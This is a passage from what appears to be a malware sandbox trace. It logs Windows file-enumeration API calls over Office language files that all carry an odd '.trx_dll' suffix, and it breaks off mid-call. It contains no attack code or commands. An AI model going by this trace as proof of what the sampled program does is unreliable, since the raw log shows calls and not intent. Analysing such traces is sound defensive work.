out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xb960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0253.204] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x39960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x47d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x248aaf00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x248aaf00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x16f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x25bbdc00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x25bbdc00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2b2560, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3564d600, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3564d600, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63b88300, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63b88300, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0253.205] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62875600, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62875600, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x35960, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x9f560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x315ed100, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x315ed100, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a4a9400, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1a4a9400, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0xd160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19196700, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x19196700, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0x43560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0253.206] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57655500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57655500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x87f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2720b500, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2720b500, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x57f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94d0df00, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x94d0df00, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca190500, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xca190500, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70273800, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x70273800, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x73960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1789a00, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa1789a00, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x24360, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2a9c700, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa2a9c700, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x110b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0253.207] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x23960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0253.208] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x126760, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0253.208] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0253.208] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0253.208] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.209] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpFilePart=0x0) returned 0x33 [0253.209] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpFilePart=0x0) returned 0x34 [0253.210] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.210] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0253.210] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xb960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x39960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x47d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x248aaf00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x248aaf00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x16f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x25bbdc00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x25bbdc00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2b2560, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3564d600, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3564d600, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63b88300, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x63b88300, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0253.211] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62875600, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x62875600, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0253.212] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x35960, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0253.212] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x9f560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0253.212] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x315ed100, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x315ed100, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0253.212] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a4a9400, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1a4a9400, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0xd160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0253.212] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19196700, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x19196700, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0x43560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0253.212] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a560, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: 